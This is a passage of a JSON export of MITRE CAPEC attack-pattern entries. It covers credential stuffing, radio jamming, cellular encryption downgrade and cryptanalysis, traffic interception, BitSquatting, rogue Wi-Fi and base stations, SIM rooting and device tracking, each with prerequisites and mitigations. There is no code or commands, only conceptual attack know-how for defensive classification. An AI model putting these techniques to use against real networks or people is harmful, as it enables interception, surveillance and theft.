user leverages the password \\"Password123\\" for a handful of application logins. An adversary obtains a victim\'s username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user\'s bank account and transfer money to an offshore account.","In October 2014 J.P. Morgan\'s Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.004","Entry_Name":"Brute Force:Credential Stuffing"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Credential stuffing"}]},"References":{"Reference":[{"External_Reference_ID":"REF-567"},{"External_Reference_ID":"REF-568"},{"External_Reference_ID":"REF-569"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}}},"601":{"ID":"601","Name":"Jamming","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"514"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"The jamming of equipment denies the availability of functioning communications services."}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"603":{"ID":"603","Name":"Blockage","Abstraction":"Standard","Status":"Draft","Description":"An adversary blocks the delivery of an important system resource causing the system to fail or stop working.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"607","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":"This attack pattern requires knowledge of where important system resources are logically located as well as how they operate."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"Blocking a resource from functional operation denies its availability to authorized users."}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"604":{"ID":"604","Name":"Wi-Fi Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack \u2013 for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":["Lack of anti-jam features in 802.11","Lack of authentication on deauthentication/disassociation packets on 802.11-based networks"]},"Skills_Required":{"Skill":["This attack can be performed by low capability attackers with freely available tools. Commercial tools are also available that can target select networks or all WiFi networks within a range of several miles.",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny the availability of the Wi-fi network to authorized users."},{"Scope":"Availability","Impact":"Resource Consumption","Note":"The attacker\'s goal is to prevent users from accessing the wireless network. Denying connectivity to the wireless network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality."}]},"Mitigations":{"Mitigation":"Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Related_Vulnerabilities, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}]}},"605":{"ID":"605","Name":"Cellular Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":"Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)"},"Skills_Required":{"Skill":["This attack can be performed by low capability attackers with commercially available tools.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"The attacker\'s goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality."}},"Mitigations":{"Mitigation":"Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"606":{"ID":"606","Name":"Weakening of Cellular Encryption","Abstraction":"Detailed","Status":"Draft","Description":"An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"620"}},"Prerequisites":{"Prerequisite":"Cellular devices that allow negotiating security modes to facilitate backwards compatibility and roaming on legacy networks."},"Skills_Required":{"Skill":["Adversaries can purchase and implement rogue BTS stations at a cost effective rate, and can push a mobile device to downgrade to a non-secure cellular protocol like 2G over GSM or CDMA.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Tracking, Network Reconnaissance"}},"Mitigations":{"Mitigation":["Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.","Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"607":{"ID":"607","Name":"Obstruction","Abstraction":"Meta","Status":"Draft","Description":"An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or even to fail.","Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary"}}},"608":{"ID":"608","Name":"Cryptanalysis of Cellular Encryption","Abstraction":"Detailed","Status":"Draft","Description":"The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"97","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Adversaries can rent commercial supercomputer time globally to conduct cryptanalysis on encrypted data captured from mobile devices. Foreign governments have their own cryptanalysis technology and capabilities. Commercial cellular standards for encryption (GSM and CDMA) are also subject to adversary cryptanalysis.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Reveals IMSI and IMEI for tracking of retransmission device and enables further follow-on attacks by revealing black network control messages. (e.g., revealing IP addresses of enterprise servers for VOIP connectivity)"}},"Mitigations":{"Mitigation":["Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.","Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"609":{"ID":"609","Name":"Cellular Traffic Intercept","Abstraction":"Detailed","Status":"Draft","Description":"Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \\"rogue\\" BTS stations is poor in many areas and it is assumed that \\"rogue\\" BTS stations exist in urban areas.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Capture all cellular and RF traffic from mobile and retransmission devices. Move bulk traffic capture to storage area for cryptanalysis of encrypted traffic, and telemetry analysis of non-encrypted data. (packet headers, cellular power data, signal strength, etc.)"}},"Mitigations":{"Mitigation":"Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"311"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns, Skills_Required"}]}},"610":{"ID":"610","Name":"Cellular Data Injection","Abstraction":"Standard","Status":"Stable","Description":"Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"240"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Attackers can disrupt or deny mobile technology communications and operations."},{"Scope":"Availability","Impact":"Modify Data","Note":"Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture."}]},"Mitigations":{"Mitigation":"Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"611":{"ID":"611","Name":"BitSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.","Technique":"Register the BitSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Wait for a user to visit the domain] Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.","Technique":"Simply wait for an error in memory to occur, redirecting the user to the malicious domain."}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults."]},"References":{"Reference":{"External_Reference_ID":"REF-485"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Architectural_Paradigms, Attack_Motivation-Consequences, Attack_Phases, Attack_Prerequisites, Description, Description Summary, Methods_of_Attack, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"612":{"ID":"612","Name":"WiFi MAC Address Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses.",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Automatic randomization of WiFi MAC addresses","Frequent changing of handset and retransmission device"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"613":{"ID":"613","Name":"WiFi SSID Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online.",{"Level":"Low"}]},"Mitigations":{"Mitigation":["Do not enable the feature of \\"Hidden SSIDs\\" (also known as \\"Network Cloaking\\") \u2013 this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.","Frequently change the SSID to new and unrelated values"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"201"},{"CWE_ID":"300"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Mitigations"}]}},"614":{"ID":"614","Name":"Rooting SIM Cards","Abstraction":"Detailed","Status":"Draft","Description":"SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. These capabilities alone provide plenty of potential for abuse.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"A SIM card that relies on the DES cipher."},"Skills_Required":{"Skill":["This is a sophisticated attack, but detailed techniques are published in open literature.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"327"}},"References":{"Reference":{"External_Reference_ID":"REF-486"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Rooting SIM CardS",{"Date":"2017-01-09"}]}},"615":{"ID":"615","Name":"Evil Twin Wi-Fi Attack","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. This also allows the adversary to use \\"adversary-in-the-middle\\" (CAPEC-94) for all communications.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"None"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Intercept and control Wi-Fi data communications to/from mobile device."}},"Mitigations":{"Mitigation":"Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description, Mitigations"}]}},"616":{"ID":"616","Name":"Establish Rogue Location","Abstraction":"Standard","Status":"Stable","Description":"An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"154"}},"Prerequisites":{"Prerequisite":"A resource is expected to available to the user."},"Skills_Required":{"Skill":["Adversaries can often purchase low-cost technology to implement rogue access points.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Other","Note":"Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary\'s subsequent actions."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Patiently Waiting at Incorrect Location",{"Date":"2017-05-01"}]}},"617":{"ID":"617","Name":"Cellular Rogue Base Station","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker imitates a cellular base station with their own \\"rogue\\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"403"},{"Exclude_ID":"513"}]}},"Prerequisites":{"Prerequisite":"None"},"Skills_Required":{"Skill":["This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Intercept and control cellular data communications to/from mobile device."}},"Mitigations":{"Mitigation":"Passively monitor cellular network connection for real-time threat detection and logging for manual review."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}]}},"618":{"ID":"618","Name":"Cellular Broadcast Message Request","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker uses knowledge of the target\u2019s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target\u2019s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"The attacker must have knowledge of the target\u2019s mobile phone number."},"Skills_Required":{"Skill":["Open source and commercial tools are available for this attack.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"An attacker could verify that the target is in (or not in) a given location."}},"Mitigations":{"Mitigation":"Frequent changing of mobile number."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"References":{"Reference":{"External_Reference_ID":"REF-487"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, References"}}},"619":{"ID":"619","Name":"Signal Strength Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively monitors the signal strength of the target\u2019s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Skills_Required":{"Skill":["Commercial tools are 